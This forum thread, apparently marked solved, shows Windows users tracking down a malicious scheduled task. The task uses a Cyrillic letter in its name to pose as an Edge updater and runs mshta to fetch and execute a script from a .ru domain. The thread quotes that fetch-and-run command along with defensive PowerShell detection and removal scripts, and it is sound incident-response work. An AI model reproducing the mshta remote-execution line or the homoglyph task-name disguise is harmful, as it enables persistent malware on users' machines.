Solved Blank Web site loads every morning


I am assuming that if you find the scheduled task that contains what’s below, you wont get that popup and it will no longer contact that site
BUT has the task already compromised your OS? I have no idea.

Scheduled Task

Code:
Author: Spike xxx
Action: mshta https ://that link.ru/update.app

Could run a remote-hosted script from a Russian domain directly on boot or login.

Dunno man…

EntryStatus
BraveUpdate.exe /uaSafe (official auto-updater)
mshta https :// that link.ru/...Malicious — delete scheduled task
F:\User\...REG ADD HKLM...batSuspicious — check contents OR is that Garlins BAT?
KMS.cmdPotentially unsafe — delete unless you use KMS legitimately
 

My Computers

System One System Two

  • OS
    Windows 11 Pro 23H2 Build 22631.5624
    Computer type
    PC/Desktop
    Manufacturer/Model
    Sin-built
    CPU
    Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz (4th Gen?)
    Motherboard
    ASUS ROG Maximus VI Formula
    Memory
    32.0 GB of I forget and the box is in storage.
    Graphics Card(s)
    Gigabyte nVidia GeForce GTX 1660 Super OC 6GB
    Sound Card
    Onboard
    Monitor(s) Displays
    5 x LG 25MS500-B - 1 x 24MK430H-B - 1 x Wacom Pro 22" Tablet
    Screen Resolution
    All over the place
    Hard Drives
    Too many to list.
    OS on Samsung 1TB 870 QVO SATA
    PSU
    Silverstone 1500
    Case
    NZXT Phantom 820 Full-Tower Case
    Cooling
    Noctua NH-D15 Elite Class Dual Tower CPU Cooler / 6 x EziDIY 120mm / 2 x Corsair 140mm somethings / 1 x 140mm Thermaltake something / 2 x 200mm Corsair.
    Keyboard
    Corsair K95 / Logitech diNovo Edge Wireless
    Mouse
    Logitech: G402 / G502 / Mx Masters / MX Air Cordless
    Internet Speed
    1000/400Mbps
    Browser
    All sorts
    Antivirus
    Kaspersky Premium
    Other Info
    I’m on a horse.
  • Operating System
    Windows 11 Pro 23H2 Build: 22631.4249
    Computer type
    Laptop
    Manufacturer/Model
    LENOVO Yoga 7i EVO OLED 14" Touchscreen i5 12 Core 16GB/512GB
    CPU
    Intel Core 12th Gen i5-1240P Processor (1.7 - 4.4GHz)
    Memory
    16GB LPDDR5 RAM
    Graphics card(s)
    Intel Iris Xe Graphics Processor
    Sound Card
    Optimized with Dolby Atmos®
    Screen Resolution
    QHD 2880 x 1800 OLED
    Hard Drives
    M.2 512GB
    Antivirus
    Defender / Malwarebytes
    Other Info
    …still on a horse.
After contemplating your situation and generally & sincerely being concerned for your protection/security — my last word of advice is that you should, without any delay, reinstall Windows 11. (I know I am not alone thinking this)

I would also advise you to reset your Router to factory defaults and set it up again.

I’d hate to read that anything horrible happened. 🙏
 

My Computers

System One System Two

  • OS
    Windows 11 Pro 23H2 Build 22631.5624
    Computer type
    PC/Desktop
    Manufacturer/Model
    Sin-built
    CPU
    Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz (4th Gen?)
    Motherboard
    ASUS ROG Maximus VI Formula
    Memory
    32.0 GB of I forget and the box is in storage.
    Graphics Card(s)
    Gigabyte nVidia GeForce GTX 1660 Super OC 6GB
    Sound Card
    Onboard
    Monitor(s) Displays
    5 x LG 25MS500-B - 1 x 24MK430H-B - 1 x Wacom Pro 22" Tablet
    Screen Resolution
    All over the place
    Hard Drives
    Too many to list.
    OS on Samsung 1TB 870 QVO SATA
    PSU
    Silverstone 1500
    Case
    NZXT Phantom 820 Full-Tower Case
    Cooling
    Noctua NH-D15 Elite Class Dual Tower CPU Cooler / 6 x EziDIY 120mm / 2 x Corsair 140mm somethings / 1 x 140mm Thermaltake something / 2 x 200mm Corsair.
    Keyboard
    Corsair K95 / Logitech diNovo Edge Wireless
    Mouse
    Logitech: G402 / G502 / Mx Masters / MX Air Cordless
    Internet Speed
    1000/400Mbps
    Browser
    All sorts
    Antivirus
    Kaspersky Premium
    Other Info
    I’m on a horse.
  • Operating System
    Windows 11 Pro 23H2 Build: 22631.4249
    Computer type
    Laptop
    Manufacturer/Model
    LENOVO Yoga 7i EVO OLED 14" Touchscreen i5 12 Core 16GB/512GB
    CPU
    Intel Core 12th Gen i5-1240P Processor (1.7 - 4.4GHz)
    Memory
    16GB LPDDR5 RAM
    Graphics card(s)
    Intel Iris Xe Graphics Processor
    Sound Card
    Optimized with Dolby Atmos®
    Screen Resolution
    QHD 2880 x 1800 OLED
    Hard Drives
    M.2 512GB
    Antivirus
    Defender / Malwarebytes
    Other Info
    …still on a horse.
Nothing horrible has happened.

This hasn't just started happening, it has gone on for a while and I have tried everything I could think of before posting here, but as usual, no one knows anything either

Thank You for your help, but your script did not find anything. No URL's are loading at startup
As stated. I have Run Autoruns, and it did not find anything. This file never loads at Startup or from a cold boot.

To recap, this popup only comes up once a day after the computer running overnight after stopping my screen saver. This is the only time this happens during the day. Never when you restart or from a cold boot. The screensaver can kick in during the day and this file does not show up wen stopping the screensaver, until the next morning.
There are no scheduled tasks In Task Scheduler

There are no other symptoms. I have scanned with several Anti-Virus/Malware apps with nothing. reported I just restored an Image from 2 months ago, but the same file shows up., I am NOT doing a clean install of Windows. I have too many programs to reinstall, It would take me several days, that is why I am always making Images.

I cannot reset my router because I have several users using it. No other devices on the network have this file show up.
I will live with it for a while and try and fix it on my own. Thanks again for your help.
 

My Computer

System One

  • OS
    Windows 11 Pro Insider 64 bit 25H2 26200.5670
    Computer type
    PC/Desktop
    Manufacturer/Model
    Gigabyte Z390 UD
    CPU
    Intel Core i7 9700K 3.60
    Motherboard
    Gigabyte Z390 UD
    Memory
    16 GB
    Graphics Card(s)
    nVidia GEForce RTX 2060 Super
    Sound Card
    onboard
    Monitor(s) Displays
    Two 27" Dell 4K monitors
    Screen Resolution
    3840 x 2160
    Hard Drives
    M.2 NVME SSD, 500 GB; Two 2TB Mechanical HDD's
    PSU
    850w PSU
    Case
    Cyberpower PC
    Cooling
    Water cooled
    Keyboard
    Backlit Cyberpower gamiong keyboard
    Mouse
    Backlit Cyberpower gaming mouse
    Internet Speed
    1 GB mbps
    Browser
    Brave
    Antivirus
    Windows Security
Nothing horrible has happened.

Buddy if “Russians” wanted to add something to your PC that gives them a back door or implants malicious code or put’s them in a position to set off ransomware… or whatever, you’re not going to know about it until something “horrible has happened”
 

My Computers

System One System Two

  • OS
    Windows 11 Pro 23H2 Build 22631.5624
    Computer type
    PC/Desktop
    Manufacturer/Model
    Sin-built
    CPU
    Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz (4th Gen?)
    Motherboard
    ASUS ROG Maximus VI Formula
    Memory
    32.0 GB of I forget and the box is in storage.
    Graphics Card(s)
    Gigabyte nVidia GeForce GTX 1660 Super OC 6GB
    Sound Card
    Onboard
    Monitor(s) Displays
    5 x LG 25MS500-B - 1 x 24MK430H-B - 1 x Wacom Pro 22" Tablet
    Screen Resolution
    All over the place
    Hard Drives
    Too many to list.
    OS on Samsung 1TB 870 QVO SATA
    PSU
    Silverstone 1500
    Case
    NZXT Phantom 820 Full-Tower Case
    Cooling
    Noctua NH-D15 Elite Class Dual Tower CPU Cooler / 6 x EziDIY 120mm / 2 x Corsair 140mm somethings / 1 x 140mm Thermaltake something / 2 x 200mm Corsair.
    Keyboard
    Corsair K95 / Logitech diNovo Edge Wireless
    Mouse
    Logitech: G402 / G502 / Mx Masters / MX Air Cordless
    Internet Speed
    1000/400Mbps
    Browser
    All sorts
    Antivirus
    Kaspersky Premium
    Other Info
    I’m on a horse.
  • Operating System
    Windows 11 Pro 23H2 Build: 22631.4249
    Computer type
    Laptop
    Manufacturer/Model
    LENOVO Yoga 7i EVO OLED 14" Touchscreen i5 12 Core 16GB/512GB
    CPU
    Intel Core 12th Gen i5-1240P Processor (1.7 - 4.4GHz)
    Memory
    16GB LPDDR5 RAM
    Graphics card(s)
    Intel Iris Xe Graphics Processor
    Sound Card
    Optimized with Dolby Atmos®
    Screen Resolution
    QHD 2880 x 1800 OLED
    Hard Drives
    M.2 512GB
    Antivirus
    Defender / Malwarebytes
    Other Info
    …still on a horse.
How do you say there's no scheduled tasks? The problem is the tasks folder hierarchy is kinda big, and running a MSHTA task is kinda sketchy in 2025. If you made that one-line code change to the PS script, it will output the full path of the task. It may be hidden under an innocuous folder path.

If you want to live it, it's your choice. But I think the solution isn't too far away based on the script's original output.
 

My Computer

System One

  • OS
    Windows 7
The last modification I made to this script was as you advised:

Replace

Code:
TaskName      = $Task.TaskName

With >

Code:
URI      = $Task.URI


Powershell:
$Output = @()

# --------------------------
# 1. User Run Entries
# --------------------------
$Output += "`r`n=== HKCU Run Entries ==="
$Output += (Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" | Select-Object PSChildName, Value | Out-String)

# --------------------------
# 2. Machine Run Entries
# --------------------------
$Output += "`r`n=== HKLM Run Entries ==="
$Output += (Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" | Select-Object PSChildName, Value | Out-String)

# --------------------------
# 3. All Scheduled Tasks
# --------------------------
$Output += "`r`n=== ALL Scheduled Tasks ==="
$AllTasks = Get-ScheduledTask | ForEach-Object {
    $Task = $_
    $Info = New-Object PSObject -Property @{
        URI        = $Task.URI
        Author        = $Task.Principal.UserId
        State         = $Task.State
        LastRunTime   = ($Task | Get-ScheduledTaskInfo).LastRunTime
        Actions       = ($Task.Actions | ForEach-Object { $_.Execute + " " + $_.Arguments }) -join "; "
        Triggers      = ($Task.Triggers | ForEach-Object { $_.StartBoundary }) -join "; "
    }
    $Info
}
$Output += ($AllTasks | Sort-Object TaskName | Format-Table -AutoSize | Out-String)

# --------------------------
# 4. Startup Services
# --------------------------
$Output += "`r`n=== Startup Services (Auto-Start) ==="
$StartupServices = Get-Service | Where-Object {$_.StartType -eq "Automatic"} | Select-Object DisplayName, Status, StartType
$Output += ($StartupServices | Sort-Object DisplayName | Format-Table -AutoSize | Out-String)

# --------------------------
# 5. Currently Running Suspicious Processes
# --------------------------
$Output += "`r`n=== Currently Running Suspicious Processes (Filtered) ==="
$Running = Get-Process | Where-Object {
    $_.Path -and (
        $_.Path -like "*AppData*" -or
        $_.Path -like "*Temp*" -or
        $_.Path -like "*brave*" -or
        $_.Path -like "*.ru*" -or
        $_.Path -like "*update*" -or
        $_.Path -like "*.exe"
    )
} | Select-Object Name, Id, Path
$Output += ($Running | Sort-Object Name | Format-Table -AutoSize | Out-String)

# --------------------------
# 6. Browser Startup URLs
# --------------------------
$Output += "`r`n=== Brave/Chrome/Edge Startup URLs ==="

$BrowserStartupPaths = @(
    "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Default\Preferences",
    "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Preferences",
    "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Preferences"
)

foreach ($Path in $BrowserStartupPaths) {
    if (Test-Path $Path) {
        $Output += "`r`n--- Startup URLs in: $Path ---"
        $RawJson = Get-Content $Path -Raw
        $StartupUrls = ($RawJson | ConvertFrom-Json -ErrorAction SilentlyContinue).session.startup_urls
        if ($StartupUrls) {
            $Output += ($StartupUrls -join "`r`n")
        } else {
            $Output += "(No startup URLs found)"
        }
    }
}

# --------------------------
# Save to custom Desktop path (F:\User\Desktop)
# --------------------------
$CustomDesktop = "F:\User\Desktop"
$FilePath = Join-Path $CustomDesktop "Startup_Check_Full.txt"
$Output | Out-File -FilePath $FilePath -Encoding UTF8

Write-Host "`nFull startup and task info saved to: $FilePath" -ForegroundColor Green
 

My Computers

System One System Two

  • OS
    Windows 11 Pro 23H2 Build 22631.5624
    Computer type
    PC/Desktop
    Manufacturer/Model
    Sin-built
    CPU
    Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz (4th Gen?)
    Motherboard
    ASUS ROG Maximus VI Formula
    Memory
    32.0 GB of I forget and the box is in storage.
    Graphics Card(s)
    Gigabyte nVidia GeForce GTX 1660 Super OC 6GB
    Sound Card
    Onboard
    Monitor(s) Displays
    5 x LG 25MS500-B - 1 x 24MK430H-B - 1 x Wacom Pro 22" Tablet
    Screen Resolution
    All over the place
    Hard Drives
    Too many to list.
    OS on Samsung 1TB 870 QVO SATA
    PSU
    Silverstone 1500
    Case
    NZXT Phantom 820 Full-Tower Case
    Cooling
    Noctua NH-D15 Elite Class Dual Tower CPU Cooler / 6 x EziDIY 120mm / 2 x Corsair 140mm somethings / 1 x 140mm Thermaltake something / 2 x 200mm Corsair.
    Keyboard
    Corsair K95 / Logitech diNovo Edge Wireless
    Mouse
    Logitech: G402 / G502 / Mx Masters / MX Air Cordless
    Internet Speed
    1000/400Mbps
    Browser
    All sorts
    Antivirus
    Kaspersky Premium
    Other Info
    I’m on a horse.
  • Operating System
    Windows 11 Pro 23H2 Build: 22631.4249
    Computer type
    Laptop
    Manufacturer/Model
    LENOVO Yoga 7i EVO OLED 14" Touchscreen i5 12 Core 16GB/512GB
    CPU
    Intel Core 12th Gen i5-1240P Processor (1.7 - 4.4GHz)
    Memory
    16GB LPDDR5 RAM
    Graphics card(s)
    Intel Iris Xe Graphics Processor
    Sound Card
    Optimized with Dolby Atmos®
    Screen Resolution
    QHD 2880 x 1800 OLED
    Hard Drives
    M.2 512GB
    Antivirus
    Defender / Malwarebytes
    Other Info
    …still on a horse.
Post 31 has all the Startup Items. I have attached the Startup Registry key
Ran the latest script in Post 46 attached are the results.
Also Forgot to mention, I ran Farbar Recovery Suite, results attached

Again, this doesn't happen at Bootup. Only when stopping the screensaver in the morning, no other time.

Still NO Startup URL's Found.
 

Attachments

My Computer

System One

  • OS
    Windows 11 Pro Insider 64 bit 25H2 26200.5670
    Computer type
    PC/Desktop
    Manufacturer/Model
    Gigabyte Z390 UD
    CPU
    Intel Core i7 9700K 3.60
    Motherboard
    Gigabyte Z390 UD
    Memory
    16 GB
    Graphics Card(s)
    nVidia GEForce RTX 2060 Super
    Sound Card
    onboard
    Monitor(s) Displays
    Two 27" Dell 4K monitors
    Screen Resolution
    3840 x 2160
    Hard Drives
    M.2 NVME SSD, 500 GB; Two 2TB Mechanical HDD's
    PSU
    850w PSU
    Case
    Cyberpower PC
    Cooling
    Water cooled
    Keyboard
    Backlit Cyberpower gamiong keyboard
    Mouse
    Backlit Cyberpower gaming mouse
    Internet Speed
    1 GB mbps
    Browser
    Brave
    Antivirus
    Windows Security
From what I can see, my script Startup check still isn't showing where mshta https://yrewdvnkl.ru/update.app is. But it exists.
So obviously my script is inadequate, so I yield
 

My Computers

System One System Two

  • OS
    Windows 11 Pro 23H2 Build 22631.5624
    Computer type
    PC/Desktop
    Manufacturer/Model
    Sin-built
    CPU
    Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz (4th Gen?)
    Motherboard
    ASUS ROG Maximus VI Formula
    Memory
    32.0 GB of I forget and the box is in storage.
    Graphics Card(s)
    Gigabyte nVidia GeForce GTX 1660 Super OC 6GB
    Sound Card
    Onboard
    Monitor(s) Displays
    5 x LG 25MS500-B - 1 x 24MK430H-B - 1 x Wacom Pro 22" Tablet
    Screen Resolution
    All over the place
    Hard Drives
    Too many to list.
    OS on Samsung 1TB 870 QVO SATA
    PSU
    Silverstone 1500
    Case
    NZXT Phantom 820 Full-Tower Case
    Cooling
    Noctua NH-D15 Elite Class Dual Tower CPU Cooler / 6 x EziDIY 120mm / 2 x Corsair 140mm somethings / 1 x 140mm Thermaltake something / 2 x 200mm Corsair.
    Keyboard
    Corsair K95 / Logitech diNovo Edge Wireless
    Mouse
    Logitech: G402 / G502 / Mx Masters / MX Air Cordless
    Internet Speed
    1000/400Mbps
    Browser
    All sorts
    Antivirus
    Kaspersky Premium
    Other Info
    I’m on a horse.
  • Operating System
    Windows 11 Pro 23H2 Build: 22631.4249
    Computer type
    Laptop
    Manufacturer/Model
    LENOVO Yoga 7i EVO OLED 14" Touchscreen i5 12 Core 16GB/512GB
    CPU
    Intel Core 12th Gen i5-1240P Processor (1.7 - 4.4GHz)
    Memory
    16GB LPDDR5 RAM
    Graphics card(s)
    Intel Iris Xe Graphics Processor
    Sound Card
    Optimized with Dolby Atmos®
    Screen Resolution
    QHD 2880 x 1800 OLED
    Hard Drives
    M.2 512GB
    Antivirus
    Defender / Malwarebytes
    Other Info
    …still on a horse.
@antspants' script didn't flag it, but FRST did.
Task: {880E6800-5859-48FC-B7A6-2B14C00C2A4E} - System32\Tasks\MicrosoftEdgeUpdateTaskMachineUА => C:\WINDOWS\system32\mshta.exe [36864 2024-04-01] (Microsoft Windows -> Microsoft Corporation) -> hxxps://yrewdvnkl.ru/update.app

You can only see it in the original file, but "TaskMachineUA", the А in UА is the Cyrillic A.

This is a common trick to replace English letters with their Latin-alphabet cousins. If you're not paying attention or your text editor doesn't flag it, then your eye is fooled into thinking this is a legitimate MS task.

Copy the exact string from FRST.txt into the TaskName argument, you need to preserve the funky character as-is.
Code:
powershell Unregister-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineUА"
 

My Computer

System One

  • OS
    Windows 7
OK Cheers.

What about a specific search?

Powershell:
# Search for a scheduled task using mshta and referencing the malicious domain
Get-ScheduledTask | ForEach-Object {
    $task = $_
    $info = $task | Get-ScheduledTaskInfo
    $matches = $false

    foreach ($action in $task.Actions) {
        if ($action.Execute -match "mshta" -and $action.Arguments -match "yrewdvnkl\.ru") {
            $matches = $true
        }
    }

    if ($matches -and $task.Principal.UserId -match "Spike Baron") {
        [PSCustomObject]@{
            TaskName     = $task.TaskName
            Path         = $task.TaskPath
            User         = $task.Principal.UserId
            Execute      = ($task.Actions | ForEach-Object { $_.Execute }) -join "; "
            Arguments    = ($task.Actions | ForEach-Object { $_.Arguments }) -join "; "
            Triggers     = ($task.Triggers | ForEach-Object { $_.StartBoundary }) -join "; "
            LastRunTime  = $info.LastRunTime
            State        = $task.State
        }
    }
}
 

My Computers

System One System Two

  • OS
    Windows 11 Pro 23H2 Build 22631.5624
    Computer type
    PC/Desktop
    Manufacturer/Model
    Sin-built
    CPU
    Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz (4th Gen?)
    Motherboard
    ASUS ROG Maximus VI Formula
    Memory
    32.0 GB of I forget and the box is in storage.
    Graphics Card(s)
    Gigabyte nVidia GeForce GTX 1660 Super OC 6GB
    Sound Card
    Onboard
    Monitor(s) Displays
    5 x LG 25MS500-B - 1 x 24MK430H-B - 1 x Wacom Pro 22" Tablet
    Screen Resolution
    All over the place
    Hard Drives
    Too many to list.
    OS on Samsung 1TB 870 QVO SATA
    PSU
    Silverstone 1500
    Case
    NZXT Phantom 820 Full-Tower Case
    Cooling
    Noctua NH-D15 Elite Class Dual Tower CPU Cooler / 6 x EziDIY 120mm / 2 x Corsair 140mm somethings / 1 x 140mm Thermaltake something / 2 x 200mm Corsair.
    Keyboard
    Corsair K95 / Logitech diNovo Edge Wireless
    Mouse
    Logitech: G402 / G502 / Mx Masters / MX Air Cordless
    Internet Speed
    1000/400Mbps
    Browser
    All sorts
    Antivirus
    Kaspersky Premium
    Other Info
    I’m on a horse.
  • Operating System
    Windows 11 Pro 23H2 Build: 22631.4249
    Computer type
    Laptop
    Manufacturer/Model
    LENOVO Yoga 7i EVO OLED 14" Touchscreen i5 12 Core 16GB/512GB
    CPU
    Intel Core 12th Gen i5-1240P Processor (1.7 - 4.4GHz)
    Memory
    16GB LPDDR5 RAM
    Graphics card(s)
    Intel Iris Xe Graphics Processor
    Sound Card
    Optimized with Dolby Atmos®
    Screen Resolution
    QHD 2880 x 1800 OLED
    Hard Drives
    M.2 512GB
    Antivirus
    Defender / Malwarebytes
    Other Info
    …still on a horse.
I'm obviously way out of my league but can't seem to shut myself the freak up.
 

My Computers

System One System Two

  • OS
    Windows 11 Pro 23H2 Build 22631.5624
    Computer type
    PC/Desktop
    Manufacturer/Model
    Sin-built
    CPU
    Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz (4th Gen?)
    Motherboard
    ASUS ROG Maximus VI Formula
    Memory
    32.0 GB of I forget and the box is in storage.
    Graphics Card(s)
    Gigabyte nVidia GeForce GTX 1660 Super OC 6GB
    Sound Card
    Onboard
    Monitor(s) Displays
    5 x LG 25MS500-B - 1 x 24MK430H-B - 1 x Wacom Pro 22" Tablet
    Screen Resolution
    All over the place
    Hard Drives
    Too many to list.
    OS on Samsung 1TB 870 QVO SATA
    PSU
    Silverstone 1500
    Case
    NZXT Phantom 820 Full-Tower Case
    Cooling
    Noctua NH-D15 Elite Class Dual Tower CPU Cooler / 6 x EziDIY 120mm / 2 x Corsair 140mm somethings / 1 x 140mm Thermaltake something / 2 x 200mm Corsair.
    Keyboard
    Corsair K95 / Logitech diNovo Edge Wireless
    Mouse
    Logitech: G402 / G502 / Mx Masters / MX Air Cordless
    Internet Speed
    1000/400Mbps
    Browser
    All sorts
    Antivirus
    Kaspersky Premium
    Other Info
    I’m on a horse.
  • Operating System
    Windows 11 Pro 23H2 Build: 22631.4249
    Computer type
    Laptop
    Manufacturer/Model
    LENOVO Yoga 7i EVO OLED 14" Touchscreen i5 12 Core 16GB/512GB
    CPU
    Intel Core 12th Gen i5-1240P Processor (1.7 - 4.4GHz)
    Memory
    16GB LPDDR5 RAM
    Graphics card(s)
    Intel Iris Xe Graphics Processor
    Sound Card
    Optimized with Dolby Atmos®
    Screen Resolution
    QHD 2880 x 1800 OLED
    Hard Drives
    M.2 512GB
    Antivirus
    Defender / Malwarebytes
    Other Info
    …still on a horse.
This is a common trick to replace English letters with their Latin-alphabet cousins. If you're not paying attention or your text editor doesn't flag it, then your eye is fooled into thinking this is a legitimate MS task.

I believe I mentioned this earlier, but didn't quite grasp it.
 

My Computers

System One System Two

  • OS
    Windows 11 Pro 23H2 Build 22631.5624
    Computer type
    PC/Desktop
    Manufacturer/Model
    Sin-built
    CPU
    Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz (4th Gen?)
    Motherboard
    ASUS ROG Maximus VI Formula
    Memory
    32.0 GB of I forget and the box is in storage.
    Graphics Card(s)
    Gigabyte nVidia GeForce GTX 1660 Super OC 6GB
    Sound Card
    Onboard
    Monitor(s) Displays
    5 x LG 25MS500-B - 1 x 24MK430H-B - 1 x Wacom Pro 22" Tablet
    Screen Resolution
    All over the place
    Hard Drives
    Too many to list.
    OS on Samsung 1TB 870 QVO SATA
    PSU
    Silverstone 1500
    Case
    NZXT Phantom 820 Full-Tower Case
    Cooling
    Noctua NH-D15 Elite Class Dual Tower CPU Cooler / 6 x EziDIY 120mm / 2 x Corsair 140mm somethings / 1 x 140mm Thermaltake something / 2 x 200mm Corsair.
    Keyboard
    Corsair K95 / Logitech diNovo Edge Wireless
    Mouse
    Logitech: G402 / G502 / Mx Masters / MX Air Cordless
    Internet Speed
    1000/400Mbps
    Browser
    All sorts
    Antivirus
    Kaspersky Premium
    Other Info
    I’m on a horse.
  • Operating System
    Windows 11 Pro 23H2 Build: 22631.4249
    Computer type
    Laptop
    Manufacturer/Model
    LENOVO Yoga 7i EVO OLED 14" Touchscreen i5 12 Core 16GB/512GB
    CPU
    Intel Core 12th Gen i5-1240P Processor (1.7 - 4.4GHz)
    Memory
    16GB LPDDR5 RAM
    Graphics card(s)
    Intel Iris Xe Graphics Processor
    Sound Card
    Optimized with Dolby Atmos®
    Screen Resolution
    QHD 2880 x 1800 OLED
    Hard Drives
    M.2 512GB
    Antivirus
    Defender / Malwarebytes
    Other Info
    …still on a horse.
The script from post 51 Found it. I ran Garlin's script in Post 50 results attached
 

Attachments

Last edited:

My Computer

System One

  • OS
    Windows 11 Pro Insider 64 bit 25H2 26200.5670
    Computer type
    PC/Desktop
    Manufacturer/Model
    Gigabyte Z390 UD
    CPU
    Intel Core i7 9700K 3.60
    Motherboard
    Gigabyte Z390 UD
    Memory
    16 GB
    Graphics Card(s)
    nVidia GEForce RTX 2060 Super
    Sound Card
    onboard
    Monitor(s) Displays
    Two 27" Dell 4K monitors
    Screen Resolution
    3840 x 2160
    Hard Drives
    M.2 NVME SSD, 500 GB; Two 2TB Mechanical HDD's
    PSU
    850w PSU
    Case
    Cyberpower PC
    Cooling
    Water cooled
    Keyboard
    Backlit Cyberpower gamiong keyboard
    Mouse
    Backlit Cyberpower gaming mouse
    Internet Speed
    1 GB mbps
    Browser
    Brave
    Antivirus
    Windows Security
That found it, how do I get rid of it?

Try this: You should be prompted (I hope). Copy paste Powershell (Admin)

Powershell:
# Define the malicious domain and user
$MaliciousDomain = "yrewdvnkl.ru"
$TargetUser = "Spike Baron"

# Find and optionally remove malicious tasks
$MaliciousTasks = Get-ScheduledTask | ForEach-Object {
    $task = $_
    $info = $task | Get-ScheduledTaskInfo
    $match = $false

    foreach ($action in $task.Actions) {
        if ($action.Execute -match "mshta" -and $action.Arguments -match [regex]::Escape($MaliciousDomain)) {
            $match = $true
        }
    }

    if ($match -and $task.Principal.UserId -match [regex]::Escape($TargetUser)) {
        [PSCustomObject]@{
            TaskName    = $task.TaskName
            Path        = $task.TaskPath
            User        = $task.Principal.UserId
            Execute     = ($task.Actions | ForEach-Object { $_.Execute }) -join "; "
            Arguments   = ($task.Actions | ForEach-Object { $_.Arguments }) -join "; "
            Triggers    = ($task.Triggers | ForEach-Object { $_.StartBoundary }) -join "; "
            LastRunTime = $info.LastRunTime
            State       = $task.State
        }
    }
} | Where-Object { $_ -ne $null }

# If tasks found, display and remove
if ($MaliciousTasks.Count -gt 0) {
    Write-Host "`n=== Suspicious Task(s) Found ===" -ForegroundColor Yellow
    $MaliciousTasks | Format-List

    foreach ($task in $MaliciousTasks) {
        $confirm = Read-Host "`nDo you want to remove task '$($task.TaskName)'? (Y/N)"
        if ($confirm -match '^[Yy]$') {
            try {
                Unregister-ScheduledTask -TaskName $task.TaskName -TaskPath $task.Path -Confirm:$false
                Write-Host "✔ Removed task: $($task.TaskName)" -ForegroundColor Green
            } catch {
                Write-Host "✘ Failed to remove task: $($task.TaskName)" -ForegroundColor Red
                Write-Host "Error: $_"
            }
        } else {
            Write-Host "⏭ Skipped task: $($task.TaskName)" -ForegroundColor Cyan
        }
    }
} else {
    Write-Host "`n✔ No matching scheduled tasks found." -ForegroundColor Green
}
 

My Computers

System One System Two

  • OS
    Windows 11 Pro 23H2 Build 22631.5624
    Computer type
    PC/Desktop
    Manufacturer/Model
    Sin-built
    CPU
    Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz (4th Gen?)
    Motherboard
    ASUS ROG Maximus VI Formula
    Memory
    32.0 GB of I forget and the box is in storage.
    Graphics Card(s)
    Gigabyte nVidia GeForce GTX 1660 Super OC 6GB
    Sound Card
    Onboard
    Monitor(s) Displays
    5 x LG 25MS500-B - 1 x 24MK430H-B - 1 x Wacom Pro 22" Tablet
    Screen Resolution
    All over the place
    Hard Drives
    Too many to list.
    OS on Samsung 1TB 870 QVO SATA
    PSU
    Silverstone 1500
    Case
    NZXT Phantom 820 Full-Tower Case
    Cooling
    Noctua NH-D15 Elite Class Dual Tower CPU Cooler / 6 x EziDIY 120mm / 2 x Corsair 140mm somethings / 1 x 140mm Thermaltake something / 2 x 200mm Corsair.
    Keyboard
    Corsair K95 / Logitech diNovo Edge Wireless
    Mouse
    Logitech: G402 / G502 / Mx Masters / MX Air Cordless
    Internet Speed
    1000/400Mbps
    Browser
    All sorts
    Antivirus
    Kaspersky Premium
    Other Info
    I’m on a horse.
  • Operating System
    Windows 11 Pro 23H2 Build: 22631.4249
    Computer type
    Laptop
    Manufacturer/Model
    LENOVO Yoga 7i EVO OLED 14" Touchscreen i5 12 Core 16GB/512GB
    CPU
    Intel Core 12th Gen i5-1240P Processor (1.7 - 4.4GHz)
    Memory
    16GB LPDDR5 RAM
    Graphics card(s)
    Intel Iris Xe Graphics Processor
    Sound Card
    Optimized with Dolby Atmos®
    Screen Resolution
    QHD 2880 x 1800 OLED
    Hard Drives
    M.2 512GB
    Antivirus
    Defender / Malwarebytes
    Other Info
    …still on a horse.
Or just go into Task Scheduler and you should be able to find task "MicrosoftEdgeUpdateTaskMachineUА"?
Delete it.
 

My Computers

System One System Two

  • OS
    Windows 11 Pro 23H2 Build 22631.5624
    Computer type
    PC/Desktop
    Manufacturer/Model
    Sin-built
    CPU
    Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz (4th Gen?)
    Motherboard
    ASUS ROG Maximus VI Formula
    Memory
    32.0 GB of I forget and the box is in storage.
    Graphics Card(s)
    Gigabyte nVidia GeForce GTX 1660 Super OC 6GB
    Sound Card
    Onboard
    Monitor(s) Displays
    5 x LG 25MS500-B - 1 x 24MK430H-B - 1 x Wacom Pro 22" Tablet
    Screen Resolution
    All over the place
    Hard Drives
    Too many to list.
    OS on Samsung 1TB 870 QVO SATA
    PSU
    Silverstone 1500
    Case
    NZXT Phantom 820 Full-Tower Case
    Cooling
    Noctua NH-D15 Elite Class Dual Tower CPU Cooler / 6 x EziDIY 120mm / 2 x Corsair 140mm somethings / 1 x 140mm Thermaltake something / 2 x 200mm Corsair.
    Keyboard
    Corsair K95 / Logitech diNovo Edge Wireless
    Mouse
    Logitech: G402 / G502 / Mx Masters / MX Air Cordless
    Internet Speed
    1000/400Mbps
    Browser
    All sorts
    Antivirus
    Kaspersky Premium
    Other Info
    I’m on a horse.
  • Operating System
    Windows 11 Pro 23H2 Build: 22631.4249
    Computer type
    Laptop
    Manufacturer/Model
    LENOVO Yoga 7i EVO OLED 14" Touchscreen i5 12 Core 16GB/512GB
    CPU
    Intel Core 12th Gen i5-1240P Processor (1.7 - 4.4GHz)
    Memory
    16GB LPDDR5 RAM
    Graphics card(s)
    Intel Iris Xe Graphics Processor
    Sound Card
    Optimized with Dolby Atmos®
    Screen Resolution
    QHD 2880 x 1800 OLED
    Hard Drives
    M.2 512GB
    Antivirus
    Defender / Malwarebytes
    Other Info
    …still on a horse.
Or just go into Task Scheduler and you should be able to find task "MicrosoftEdgeUpdateTaskMachineUА"?
Delete it.
The RIGHT one. There's one with an English A, and one with a Cyrillic A.
You may have to click on the task's properties to expand the actual details.
 

My Computer

System One

  • OS
    Windows 7
